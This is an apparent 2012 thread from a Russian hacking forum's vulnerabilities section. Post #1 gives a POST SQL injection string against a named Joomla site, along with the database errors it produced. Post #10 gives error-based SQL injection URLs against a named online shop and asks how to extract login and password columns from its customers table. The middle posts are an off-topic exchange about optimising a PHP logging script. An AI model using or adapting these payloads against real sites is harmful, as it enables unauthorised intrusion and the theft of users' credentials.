HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.03.2012, 17:45
d4rkn3ss
Новичок
Регистрация: 13.01.2012
Сообщений: 6
С нами: 7542326

Репутация: 0
По умолчанию

This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.

Код:
task=category&sectionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54
To get the error I used HackBar for Firefox, I put in this first:

Code:

http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html

Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):

Code:

Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344
 
Ответить с цитированием

  #2  
Старый 08.03.2012, 22:41
Qwert321
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами: 9100829

Репутация: 0
По умолчанию

Ребят подскажите как оптимизировать код. Этот код просто записывает лог посещений, но все страницы куда я его добавляю явно медленнее загружаются

Сам код(пишу недавно за безграмотность не судить):
 
Ответить с цитированием

  #3  
Старый 08.03.2012, 22:47
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Qwert321  
Ребят подскажите как оптимизировать код. Этот код просто записывает лог посещений, но все страницы куда я его добавляю явно медленнее загружаются
Сам код(пишу недавно за безграмотность не судить):

Ты предлагаешь его еще дешифровать? Если приведешь код в нормальное, понятное состояние могу постараться помочь тебе.
 
Ответить с цитированием

  #4  
Старый 08.03.2012, 22:51
Qwert321
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами: 9100829

Репутация: 0
По умолчанию

Цитата:
Сообщение от R0nin  
Ты предлагаешь его еще дешифровать? Если приведешь код в нормальное, понятное состояние могу постараться помочь тебе.
сорри исправил... просто пока пробовал вставиьть как пхп код тупо вышло ...ну вообщем ща норм всё
 
Ответить с цитированием

  #5  
Старый 08.03.2012, 22:59
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Qwert321  
сорри исправил... просто пока пробовал вставиьть как пхп код тупо вышло ...ну вообщем ща норм всё
Уже вижу. Так тебе нужна была подсказка, вот подсказка от меня:
  1. Каждый раз подключаться к DB, потом отключаться, и так покругу - глупо. Один раз подключись, построй свою систему, где будешь передавать уже действующий идентификатор подключения. Это намного ускорить твой код.
  2. Зачем столько раз вызывать urlencode()? Для чего ты его вообще вызываешь? Найди альтернативу. Все функция работающие со строками медленные, но некоторые медленее чем другие. Поэтому, найди оптимальный вариант для своего случая. Функций для работы со строками дофига (особенно в PHP).
  3. Разделяй код на функции. Зачем все в один файл толкать. Понимаю что это может чуть замедлить код, но в дальнейшем намного легче будеть исправлять ошибки, расширять функционал скрипта и т.д.
 
Ответить с цитированием

  #6  
Старый 08.03.2012, 23:04
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Кстати, я вообще не догнал, зачем ты этот вопрос написал в теме про уязвимостей? Тут же есть тема про PHP, пиши там.
 
Ответить с цитированием

  #7  
Старый 08.03.2012, 23:07
Qwert321
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами: 9100829

Репутация: 0
По умолчанию

Цитата:
Сообщение от R0nin  
Уже вижу. Так тебе нужна была подсказка, вот подсказка от меня:
  1. Зачем столько раз вызывать urlencode()? Для чего ты его вообще вызываешь? Найди альтернативу. Все функция работающие со строками медленные, но некоторые медленее чем другие. Поэтому, найди оптимальный вариант для своего случая. Функций для работы со строками дофига (особенно в PHP).
  2. Разделяй код на функции. Зачем все в один файл толкать. Понимаю что это может чуть замедлить код, но в дальнейшем намного легче будеть исправлять ошибки, расширять функционал скрипта и т.д.
urlencode от sql inj

Какие тут функции то делать код три строчки
 
Ответить с цитированием

  #8  
Старый 08.03.2012, 23:10
Qwert321
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами: 9100829

Репутация: 0
По умолчанию

Цитата:
Сообщение от R0nin  
Кстати, я вообще не догнал, зачем ты этот вопрос написал в теме про уязвимостей? Тут же есть тема про PHP, пиши там.
действительно... сори модеров прошшу удалить сообщения... пойду искать другую ветку
 
Ответить с цитированием

  #9  
Старый 08.03.2012, 23:24
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Qwert321  
urlencode от sql inj
Какие тут функции то делать код три строчки
От SQL-inj используются другие функция. urlencode переведет все специальные знаки, а это не обязательно, чтобы защититься от SQL-inj.
 
Ответить с цитированием

  #10  
Старый 08.03.2012, 23:33
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

а такой вопрос

чего тут емеил выводится нормально,

Цитата:
Сообщение от None  
http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+table_schema+from+information_schema.t ables+where+table_name=0x53435f637573746f6d657273% 29,0x00,floor%28rand%280%29*2%29%29having+min%280% 29+or+1--+
а логин и пароль невыводятся вобще

Цитата:
Сообщение от None  
http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+Login+from+play_today.SC_customers+lim it+0,1%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+
как их вывести?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.